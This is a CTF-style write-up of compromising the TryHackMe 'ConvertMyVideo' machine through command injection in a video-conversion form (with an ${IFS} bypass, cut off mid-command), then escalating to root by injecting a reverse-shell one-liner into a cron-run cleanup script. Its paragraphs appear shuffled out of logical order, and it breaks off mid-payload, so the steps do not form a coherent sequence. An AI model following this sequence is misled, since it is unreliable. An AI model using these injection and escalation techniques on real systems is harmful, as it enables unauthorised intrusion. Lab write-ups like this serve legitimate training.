Today I rooted the ‘ConvertMyVideo’ machine on TryHackMe as a part of the TCM’s Linux Privilege Escalation course and decided I learnt a fair amount from it and should likely lock it in my memory by writing about it.

Once I had this I tried using more complicated commands, such as trying to use netcat to call back to our machine, however I kept running into issues with the command getting snapped into bits by the script.

Firstly you need to do some enumeration, mainly because you need to know if you are using pspy32 or pspy64, which depends on the architecture of the system. I check this with the dpkg — print-architecture command, but there are multiple other ways.

I do two scans, an all purpose scan against all ports with -p- and then an aggressive scan with -A against the noted ports.

Honestly, I am not the biggest fan of web application pentesting but I did enjoy tampering with the traffic a little here, likely because it wasn’t actually a lot to test.

After doing that, you can transfer pspy, make it executable and boot it up. I transferred my static version by hosting a python server and using wget. I couldn’t use the dynamically linked version due to library errors.

So for this, with no tools active, I just put in a valid entry and an invalid entry and checked what the differences were. Nothing dramatic happens, apart from some wording on the page changes.

Next, navigate to the main website and get the script running (by inputting a fake youtube ID and hit convert), pspy should then populate with what commands are running on the system.

First thing I did from this point was load up Burpsuite and capture the traffic after I hit the convert button, and see what exactly is going on.

If we go and look at the script a simple script that runs rm -rf downloads, which is cleaning the downloads folder. We can take this opptunity to inject some code in, I put a bash one-liner in for a reverse shell.

So, now we can begin attempting different types of bypasses and see if we can get a command to work on the machine. I picked the simple commands of ls and pwd, I picked two in an attempt to avoid any false negatives throwing me off.

The machine itself is a Linux box with a simple foothold (in theory) with some defenses, after that we are needing to do some in-depth enumeration than I have done before to get root.

That gives us a little bit of information to go off of, we will likely be looking to break some form of program or script.

The results of the command are hidden within the error, so it is important to know what a normal error looks like allowing you to pick out the differences easily.

Once the script is uploaded, as per fig 4, you can then send through a command to execute it (but set up your listener first!). I originally tried $(./.sh) but that didn’t work, had to use $(bash${IFS}